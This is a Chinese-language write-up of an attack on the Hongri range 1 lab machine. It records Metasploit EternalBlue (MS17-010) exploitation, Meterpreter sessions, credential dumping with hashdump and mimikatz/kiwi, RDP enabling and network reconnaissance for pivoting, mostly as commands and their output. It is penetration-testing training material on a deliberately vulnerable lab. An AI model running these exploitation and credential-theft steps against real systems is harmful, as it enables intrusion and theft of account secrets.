红日靶场一有两种Getshell方式
方法一:木马反弹shell
方法二:永恒之蓝
由于方法一过于简单,这里尝试使用msf6及永恒之蓝漏洞
在这之前可以使用nmap扫描一下端口开启情况,我这里直接使用Goby进行一个扫
加载MS17_010扫描模块开扫
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.239.63
rhost => 192.168.239.63
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.239.63:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.63:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed确认存在永恒之蓝漏洞
加载永恒之蓝攻击模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.239.63
rhost => 192.168.239.63
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] 192.168.239.63:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.239.63:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.63:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.239.63:445 - The target is vulnerable.
[*] 192.168.239.63:445 - Connecting to target for exploitation.
[+] 192.168.239.63:445 - Connection established for exploitation.
[+] 192.168.239.63:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.239.63:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.239.63:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.239.63:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.239.63:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.239.63:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.239.63:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.239.63:445 - Sending all but last fragment of exploit packet
[*] 192.168.239.63:445 - Starting non-paged pool grooming
[+] 192.168.239.63:445 - Sending SMBv2 buffers
[+] 192.168.239.63:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.239.63:445 - Sending final SMBv2 buffers.
[*] 192.168.239.63:445 - Sending last fragment of exploit packet!
[*] 192.168.239.63:445 - Receiving response from exploit packet
[+] 192.168.239.63:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.239.63:445 - Sending egg to corrupted connection.
[*] 192.168.239.63:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.239.63
[*] Meterpreter session 1 opened (192.168.2.15:42585 -> 192.168.239.63:4444 ) at 2022-05-12 04:57:11 -0400
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.63:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > 多尝试几次获取了权限,由于是内网与靶机隔了一个网段无法反向shell,于是手动关闭了防火墙进行了正向shell的连接
然后进行权限提升
meterpreter > sysinfo
Computer : STU1
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : GOD
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
[-] Already running as SYSTEM发现已经是system权限了,我们直接getsystem就好
PS:后期不知道为什么creds_all模块用不了,顺便前面迁移个进程吧,有些32位的meterpreter可能载入模块有点问题
将meterpreter迁移去64位进程
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
····
612 488 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\sv ox.exe
····
meterpreter > migrate 612
[*] Migrating from 648 to 612...
[*] Migration completed successfully.
meterpreter > getsystem
[-] Already running as SYSTEMhashdump输出密码hash,或者载入kiwi模块直接获取所有密码
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > Interrupt: use the 'exit' command to
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
[-] Error running command creds_all: ActiveRecord::RecordInvalid Validation failed: Data is not in the NTLMHash data format of :, where each hex digest is 32 lowercase hexadecimal characters.
meterpreter > 2022/5/20 PS:再一次尝试又可以了,可能是Kali内核的问题,我换了个kali版本就跑出来了
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator GOD edea194d76c77d87923b 8c535a2d84c3b21059d6 eea06a1ec2e153a9441c6
4276177762ae 67639bb89db5 6e6fc4f55bce155cba9
STU1$ GOD ac41fb70fbcd369d67cf 2ca7a7350a1e590da1e04
0f4b8c899583 af042387378a9d351f0
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD hongrisec@2022
STU1$ GOD ...
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Administrator GOD hongrisec@2022
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator GOD.ORG hongrisec@2022
stu1$ GOD.ORG ...
还是不知道报什么错,于是上网找了另一种方法,kiwi_cmd可以调用mimikatz模块的所有功能
meterpreter > kiwi_cmd sekurlsa::logonpasswords
····
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : edea194d76c77d87840ac10a764c7362
* NTLM : 8a963371a63944419ec1adf687bb1be5
* SHA1 : 343f44056ed02360aead5618dd42e4614b5f70cf
tspkg :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019
wdigest :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : hongrisec@2019
ssp :
credman :
····2022/5/29 书接上回:
已经有不少东西发生了改变了,所以接下来的密码之类的可能和上面展示的有所不同
由于是Windows 7主机,可以尝试开启下3389的Rdp端口
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20220529040006_default_192.168.239.53_host.windows.cle_201935.txt这里已经被我小伙伴先行一步打开了
尝试下远程登陆
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "hongrisec@2022" 192.168.239.53
rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u Administrator -p "hongrisec@2022" 192.168.239.53好像Rdp都登录不进去,可能是限制了域,那就找别的办法,可以直接添加路由,挂Socks代理
ipconfig /all查看所有内网网段
meterpreter > ipconfig /all
···
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:c2:e7:1b
MTU : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
···
Interface 25
============
Name : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:c2:e7:25
MTU : 1500
IPv4 Address : 192.168.239.53
IPv4 Netmask : 255.255.255.0
···发现其内网还有一个网段,那么直接考虑将其代理出来
